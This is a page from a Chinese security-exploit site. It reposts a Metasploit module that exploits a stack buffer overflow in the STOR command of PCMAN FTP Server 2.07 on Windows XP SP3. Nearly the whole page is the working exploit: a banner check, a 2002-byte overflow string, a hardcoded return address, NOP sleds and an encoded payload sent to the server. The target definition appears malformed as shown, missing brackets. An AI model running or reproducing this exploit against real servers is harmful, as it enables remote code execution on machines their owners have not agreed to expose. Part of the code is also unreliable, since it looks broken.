首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PCMAN FTP 2.07 STOR Command - Stack Overflow Exploit (MSF)
来源:metasploit.com 作者:Flores 发布时间:2013-09-18  
require 'msf/core'
   
class Metasploit3 < Msf::Exploit::Remote
    Rank = AverageRanking
   
    include Msf::Exploit::Remote::Ftp
       
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'PCMAN FTP Server STOR Command Stack Overflow',
            'Description'    => %q{
                        This module exploits a buffer overflow vulnerability
                        found in the STOR command of the PCMAN FTP v2.07 Server
                        when the "/../" parameters are also sent to the server.
            },
            'Author'         => [
                        'Christian (Polunchis) Ramirez',    # Initial Discovery
                        'Rick (nanotechz9l) Flores',        # Metasploit Module                             
                    ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: $',
            'References'     =>
                [
                    [ 'URL', 'http://www.exploit-db.com/exploits/27703/' ],
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                },
            'Payload'        =>
                {
                    'Space'         => 1000,
                    'BadChars'      => "\x00\xff\x0a\x0d\x20\x40",
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Windows XP SP3'
                        
                            'Ret' => 0x7C91FCD8, # jmp esp from kernel32.dll
                            'Offset' => 2002
                        
                    ],
                ],
            'DisclosureDate' => 'Jul 17 2011',
            'DefaultTarget' => 0))
    end
       
    def check
    connect
    disconnect
    if (banner =~ /220 PCMan's FTP Server 2.0/)
        return Exploit::CheckCode::Vulnerable
        end
        return Exploit::CheckCode::Safe
    end
   
    def exploit
        connect_login
        print_status("Trying victim #{target.name}...")     
        sploit = "\x41" * 2002 + [target.ret].pack('V') + make_nops(4) + "\x83\xc4\x9c" + payload.encoded
        sploit << make_nops(4)
        sploit << payload.encoded
        send_cmd( ['STOR', '/../' + sploit], false )
        handler
        disconnect
    end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Ofilter Player 1.2.0.1 Buffer
·D-Link Devices UPnP SOAP Telne
·Mitsubishi MC-WorkX 8.02 Activ
·Sophos Web Protection Applianc
·Vestel TV 42pf9322 - Denial of
·Sophos Web Protection Applianc
·Target Longlife Media Player 2
·Agnitum Outpost Internet Secur
·MS13-053 Win32k Memory Allocat
·HP ProCurve Manager SNAC Updat
·eM Client e-mail client v5.0.1
·HP ProCurve Manager SNAC Updat
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved